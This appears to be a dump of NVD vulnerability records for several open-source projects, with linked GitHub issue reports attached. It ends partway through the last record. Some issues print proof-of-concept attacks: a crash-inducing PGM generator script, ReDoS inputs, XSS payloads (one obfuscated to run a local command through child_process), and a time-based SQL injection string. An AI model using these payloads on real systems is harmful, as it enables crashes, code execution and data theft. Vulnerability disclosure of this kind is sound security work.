[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*", "matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/nothings/stb/issues/1225
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
**Summary** stb_image's PNM loader in version v2.27 incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location. CVE number: [CVE-2021-42716](https://nvd.nist.gov/vuln/detail/CVE-2021-42716) **Describe the bug** In stb_image's PNM reader, loading a valid 16-bit PGM file that is large enough with the number of components set to 4 can cause a crash in `stbi__convert_16_to_8()` due to an out-of-bounds read. This issue includes a fix in pull request #1223, and a proof of concept file that can be used to reproduce the crash. We're reporting this on GitHub Issues following the guidance in issue #1213. This appears to be due to how when `stbi__pnm_load()` loads a 16-bit PGM file with N bytes of data, it incorrectly calls `stbi__convert_format()` instead of `stbi__convert_format16()`, returning a buffer that is 2N bytes long instead of 4N bytes. Since `ri.bits_per_channel` is still 16 when control returns to `stbi__load_and_postprocess_8bit()`, `stbi__convert_16_to_8()` attempts to read `img_len=4N` bytes of data from this buffer, resulting in out-of-bounds reads. When N is large enough, this results in an access violation. **To Reproduce** This .zip contains a 513 KB .pgm file, 16_to_8_oob_poc.pgm, which reproduces this issue: [16_to_8_oob_poc.zip](https://github.com/nothings/stb/files/7306670/16_to_8_oob_poc.zip) Calling `stbi_load()` with a path to this file and with a req_comp of 4 produces a crash. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version 20H2 with Microsoft Visual Studio 2019, and I expect it should reproduce on other systems as well. This file was generated using the following Python script, and should be a valid PGM file: ``` f = open('16_to_8_oob_poc.pgm', 'wb') f.write(b'P5\n\n512 512\n65535\n') f.write(bytearray([1]*512*512*2)) f.close() ``` It was derived from an example found using the [Radamsa fuzzer](https://gitlab.com/akihe/radamsa). Interestingly, tests/pbm/basi0g16.pgm is also a 16-bit PGM file, but reading it doesn't cause a crash! I believe the reason is because this is a 32 x 32 image, so it only includes N=2048 bytes of image data, and as a result the out-of-bounds reads don't cross a page boundary that would result in an access violation. **Expected behavior** The example file should be loaded without crashing. **Screenshots** Here's a screenshot showing where the crash occurs and the call stack, when run with the example file in image_test.c. (Note that the call in image_test.c may be off by 2 lines; the specific callsite is `stbi_load(argv[i], &w, &h, &n, 4)`.) ![example_pgm_access_violation_and_call_stack](https://user-images.githubusercontent.com/57467222/136454766-d39c1a91-e1f8-4b04-bff8-6e4871e5de4d.png) Thanks!
In stb_image's PNM reader, loading a specially constructed valid 16-bit PGM file with 4 channels can cause a crash due to an out-of-bounds read
https://api.github.com/repos/nothings/stb/issues/1225/comments
3
2021-10-07T20:08:31Z
2023-01-29T23:48:18Z
https://github.com/nothings/stb/issues/1225
1,020,416,230
1,225
2,712
CVE-2021-42836
2021-10-22T18:15:14.897
GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/236" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/237" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*", "matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E", "versionEndExcluding": "1.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/tidwall/gjson/issues/236
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tidwall", "gjson" ]
func main() { testJson := `#[%"*?**?**?**?**?**?***?**?**?**?**?*"""]` gjson.Get(testJson, testJson) }
gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input.
https://api.github.com/repos/tidwall/gjson/issues/236/comments
0
2021-10-01T04:53:27Z
2021-10-04T18:48:58Z
https://github.com/tidwall/gjson/issues/236
1,012,886,786
236
2,713
CVE-2021-42836
2021-10-22T18:15:14.897
GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/236" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/236" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/tidwall/gjson/issues/237" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*", "matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E", "versionEndExcluding": "1.9.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/tidwall/gjson/issues/237
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "tidwall", "gjson" ]
func main() { testJson := `#[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]` gjson.Get(testJson, testJson) }
gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input.
https://api.github.com/repos/tidwall/gjson/issues/237/comments
2
2021-10-08T09:28:45Z
2022-06-09T09:41:39Z
https://github.com/tidwall/gjson/issues/237
1,020,889,800
237
2,714
CVE-2021-41172
2021-10-26T14:15:08.067
AS_Redis is an AntSword plugin for Redis. The Redis Manage plugin for AntSword prior to version 0.5 is vulnerable to Self-XSS due to due to insufficient input validation and sanitization via redis server configuration. Self-XSS in the plugin configuration leads to code execution. This issue is patched in version 0.5.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/AntSword-Store/AS_Redis/issues/1" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Medicean/AS_Redis/security/advisories/GHSA-j8j6-f829-w425" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/AntSword-Store/AS_Redis/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Medicean/AS_Redis/security/advisories/GHSA-j8j6-f829-w425" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:antsword_redis_project:antsword_redis:*:*:*:*:*:antsword:*:*", "matchCriteriaId": "BD8189A1-67C4-4BD3-A602-30256D3B5413", "versionEndExcluding": "0.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/AntSword-Store/AS_Redis/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "AntSword-Store", "AS_Redis" ]
Discoverer: cc7v@校长 ### Affected AS_Redis Plugin version <= v0.4 ### Fixed AS_Redis Plugin version >= v0.5 ### PoC ``` <img src=1 onerror=alert(1)> ``` ![image](https://user-images.githubusercontent.com/6082020/138047485-5b3b17c7-f491-47a6-9197-5f0f7604d27d.png) ### Exploit Lead to Local Code Execution ``` <img src=1 onerror="eval(String.fromCharCode(114,101,113,117,105,114,101,40,39,99,104,105,1 08,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,97,108,99, 46,101,120,101,39,41))"> ``` ![image](https://user-images.githubusercontent.com/6082020/138047583-8a8c56ec-c66f-4170-a9d8-0ef46d98bb83.png) ### Reference https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw
v0.4 Self-XSS in host addr
https://api.github.com/repos/AntSword-Store/AS_Redis/issues/1/comments
0
2021-10-20T07:33:14Z
2021-10-20T07:35:22Z
https://github.com/AntSword-Store/AS_Redis/issues/1
1,031,076,330
1
2,715
CVE-2021-41185
2021-10-26T15:15:10.533
Mycodo is an environmental monitoring and regulation system. An exploit in versions prior to 8.12.7 allows anyone with access to endpoints to download files outside the intended directory. A patch has been applied and a release made. Users should upgrade to version 8.12.7. As a workaround, users may manually apply the changes from the fix commit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/issues/1105" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/releases/tag/v8.12.7" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/security/advisories/GHSA-252r-94ph-m229" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/issues/1105" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/releases/tag/v8.12.7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kizniche/Mycodo/security/advisories/GHSA-252r-94ph-m229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mycodo_project:mycodo:*:*:*:*:*:*:*:*", "matchCriteriaId": "C8B4BD3A-4B47-41A4-84D2-B9E703773D53", "versionEndExcluding": "8.12.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/kizniche/Mycodo/issues/1105
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kizniche", "Mycodo" ]
What would be the right contact to report a security vulnerabilty? thanks!
Security Vulnerability
https://api.github.com/repos/kizniche/Mycodo/issues/1105/comments
8
2021-10-25T06:38:07Z
2021-10-27T02:27:36Z
https://github.com/kizniche/Mycodo/issues/1105
1,034,737,651
1,105
2,716
CVE-2020-22864
2021-10-26T22:15:08.060
A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor 3.1.0 allows attackers to execute arbitrary web scripts or HTML.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/froala/wysiwyg-editor/issues/3880" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.youtube.com/watch?v=WE3b1iSnWJY" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/froala/wysiwyg-editor/issues/3880" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.youtube.com/watch?v=WE3b1iSnWJY" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:froala:froala_editor:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "66771C0F-E1E4-4482-A41E-5DF819031499", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/froala/wysiwyg-editor/issues/3880
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "froala", "wysiwyg-editor" ]
##### Steps to reproduce the problem. 1.Go to the Official demo [https://froala.com/wysiwyg-editor/](url) 2.Click on the [+] button 3.Click on [insert video] button 4.Click on [Embedded Code] button 5.Paste the payload `<EMBED/SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw ICIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJUaGVyZSBpcyBhIFhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">` ##### Recording. [https://www.youtube.com/watch?v=WE3b1iSnWJY](url)
XSS vulnerability in [insert video]
https://api.github.com/repos/froala/wysiwyg-editor/issues/3880/comments
13
2020-04-16T15:51:52Z
2022-06-29T18:54:36Z
https://github.com/froala/wysiwyg-editor/issues/3880
601,191,526
3,880
2,717
CVE-2020-21250
2021-10-27T20:15:07.817
CSZ CMS v1.2.4 was discovered to contain an arbitrary file upload vulnerability in the component /core/MY_Security.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.4:*:*:*:*:*:*:*", "matchCriteriaId": "06BDEA94-6AA0-4AC0-B769-F41D2FCCBB5E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cskaza/cszcms/issues/22
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
Hi, @cskaza and I found an arbitrary file upload vulnerability in cszcms-1.2.4. The vulnerable code is on cszcms/core/MY_Security.php file line 47. ![图片](https://user-images.githubusercontent.com/3412787/68830868-de006000-06e7-11ea-8694-7e226980525a.png) I think using the function ‘escape-string’ can solve the sql injection vulnerability,but you use function 'xss_clean' after it.The function 'xss_clean' can decode str with function 'rawurldecode',so I can exploit like #19 . Urlencode the value of UA: Before: User-Agent: '-( if(1=1, sleep(5), 1) )-'', '192.168.1.11','time') # After: User-Agent: %27%2d%28%20%69%66%28%31%3d%31%2c%20%73%6c%65%65%70%28%35%29%2c%20%31%29%20%29%2d%27%27%2c%20%27%31%39%32%2e%31%36%38%2e%31%2e%31%31%27%2c%27%74%69%6d%65%27%29%20%23 ![图片](https://user-images.githubusercontent.com/3412787/68831638-d6da5180-06e9-11ea-8dd7-64d84607cfc8.png) Suggest: Remove function 'xss_clean' here.
Time-based blind SQL injection Vulnerability in CSZCMS-1.2.4
https://api.github.com/repos/cskaza/cszcms/issues/22/comments
2
2019-11-14T06:26:14Z
2019-11-27T16:27:29Z
https://github.com/cskaza/cszcms/issues/22
522,652,620
22
2,718
CVE-2020-22312
2021-10-28T15:15:07.027
A cross-site scripting (XSS) vulnerability was discovered in the OJ/admin-tool /cal_scores.php function of HZNUOJ v1.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wlx65003/HZNUOJ/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wlx65003/HZNUOJ/issues/17" } ]
